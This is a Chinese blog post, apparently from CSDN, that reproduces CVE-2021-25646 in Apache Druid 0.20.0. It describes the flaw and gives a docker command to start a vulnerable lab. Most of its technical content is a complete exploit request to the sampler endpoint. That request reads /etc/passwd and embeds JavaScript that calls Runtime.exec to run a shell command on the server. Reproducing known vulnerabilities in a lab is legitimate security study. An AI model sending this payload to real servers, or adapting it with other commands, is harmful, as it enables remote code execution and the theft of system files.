Apache Druid 代码执行漏洞（CVE-2021-25646）

本文链接：https://blog.csdn.net/weixin_45910629/article/details/135372756

本文描述了ApacheDruid0.20.0版本中的一个安全漏洞，攻击者可通过恶意请求利用内置引擎执行任意JavaScript代码，可能导致代码和命令执行。文章提供了漏洞环境设置和复现步骤。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Apache Druid是一个开源的分布式数据存储。
Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用，并且默认是禁用的。然而，在Druid 0.20.0及以前的版本中，攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码，而不管服务器配置如何，这将导致代码和命令执行漏洞。

漏洞环境

执行命令启动一个Apache Druid 0.20.0服务器：

docker compose up -d

服务启动后，访问http://your-ip:8888即可查看到Apache Druid主页。在这里插入图片描述

漏洞复现

发送如下请求，执行其中的JavaScript代码

POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.1.2:8888
Content-Length: 912
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.1.2:8888
Referer: http://192.168.1.2:8888/unified-console.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
    "type":"index",
    "spec":{
        "ioConfig":{
            "type":"index",
            "firehose":{
                "type":"local",
                "baseDir":"/etc",
                "filter":"passwd"
            }
        },
        "dataSchema":{
            "dataSource":"test",
            "parser":{
                "parseSpec":{
                "format":"javascript",
                "timestampSpec":{

                },
                "dimensionsSpec":{

                },
                "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
                "":{
                    "enabled":"true"
                }
                }
            }
        }
    },
    "samplerConfig":{
        "numRows":10
    }
}

在这里插入图片描述